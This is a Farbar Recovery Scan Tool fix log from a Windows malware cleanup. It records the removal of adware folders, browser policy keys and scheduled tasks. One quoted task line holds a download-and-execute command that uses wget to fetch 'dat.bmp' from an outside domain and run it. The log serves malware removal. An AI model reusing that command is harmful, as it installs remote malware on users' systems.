Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 04-01-2015
Ran by Maciej at 2015-01-06 18:10:59 Run:1
Running from C:\Users\Maciej\Downloads
Loaded Profile: Maciej (Available profiles: Maciej)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
CloseProcesses:
CreateRestorePoint:
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
Task: {2AA368BC-A77B-47EB-9ABD-5CEC742BDC74} - System32\Tasks\{A78CDB68-B25E-4572-9104-03E726D960DC} => pcalua.exe -a C:\Users\Maciej\Downloads\ACPI32_64_Win7\Acpi\AsusSetup.exe -d C:\Users\Maciej\Downloads\ACPI32_64_Win7\Acpi
Task: {8DF6F1AC-6266-46C0-A0E5-736B5F75AC67} - System32\Tasks\DriverEasy Scheduled Scan => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe
Task: {AB6E172A-57D0-48B0-98D6-96DBF75A66D8} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=or8cRVRHP2e7DIJ0FtvF;DrivGen;1419712785 & start cmd /R dat.bmp <==== ATTENTION
Task: {B03FE938-B0E5-4E6E-AC8C-DCBDAE9AFE2E} - System32\Tasks\{FACA796A-C22B-4C08-8837-473AAF64DABD} => pcalua.exe -a C:\Users\Maciej\Downloads\ACPI32_64_Win7\AsusSetup.exe -d C:\Users\Maciej\Downloads\ACPI32_64_Win7
Task: C:\Windows\Tasks\DriverEasy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
C:\Program Files\Probit Software
C:\Program Files\unisaLees
C:\ProgramData\dat.bmp
C:\ProgramData\wget.exe
C:\ProgramData\17691939238860040889
C:\ProgramData\ikgndmebaegbafjaefkbgapbcookdmol
C:\ProgramData\APN
C:\ProgramData\EpicScale
C:\Users\Maciej\AppData\Roaming\Easeware
C:\Users\Maciej\AppData\Roaming\SkypEmoticons
EmptyTemp:
*****************

Processes closed successfully.
Restore point was successfully created.
"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2AA368BC-A77B-47EB-9ABD-5CEC742BDC74}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2AA368BC-A77B-47EB-9ABD-5CEC742BDC74}" => Key deleted successfully.
C:\Windows\System32\Tasks\{A78CDB68-B25E-4572-9104-03E726D960DC} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{A78CDB68-B25E-4572-9104-03E726D960DC}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8DF6F1AC-6266-46C0-A0E5-736B5F75AC67}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8DF6F1AC-6266-46C0-A0E5-736B5F75AC67}" => Key deleted successfully.
C:\Windows\System32\Tasks\DriverEasy Scheduled Scan => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DriverEasy Scheduled Scan" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{AB6E172A-57D0-48B0-98D6-96DBF75A66D8}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB6E172A-57D0-48B0-98D6-96DBF75A66D8}" => Key deleted successfully.
C:\Windows\System32\Tasks\SYSTEM => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SYSTEM" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B03FE938-B0E5-4E6E-AC8C-DCBDAE9AFE2E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B03FE938-B0E5-4E6E-AC8C-DCBDAE9AFE2E}" => Key deleted successfully.
C:\Windows\System32\Tasks\{FACA796A-C22B-4C08-8837-473AAF64DABD} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{FACA796A-C22B-4C08-8837-473AAF64DABD}" => Key deleted successfully.
C:\Windows\Tasks\DriverEasy Scheduled Scan.job => Moved successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Value was restored successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Value was restored successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Value was restored successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Value was restored successfully.
C:\Program Files\Probit Software => Moved successfully.
C:\Program Files\unisaLees => Moved successfully.
C:\ProgramData\dat.bmp => Moved successfully.
"C:\ProgramData\wget.exe" => File/Directory not found.
C:\ProgramData\17691939238860040889 => Moved successfully.
C:\ProgramData\ikgndmebaegbafjaefkbgapbcookdmol => Moved successfully.
C:\ProgramData\APN => Moved successfully.
C:\ProgramData\EpicScale => Moved successfully.
C:\Users\Maciej\AppData\Roaming\Easeware => Moved successfully.
C:\Users\Maciej\AppData\Roaming\SkypEmoticons => Moved successfully.
EmptyTemp: => Removed 323.3 MB temporary data.

The system needed a reboot.

==== End of Fixlog 18:12:10 ====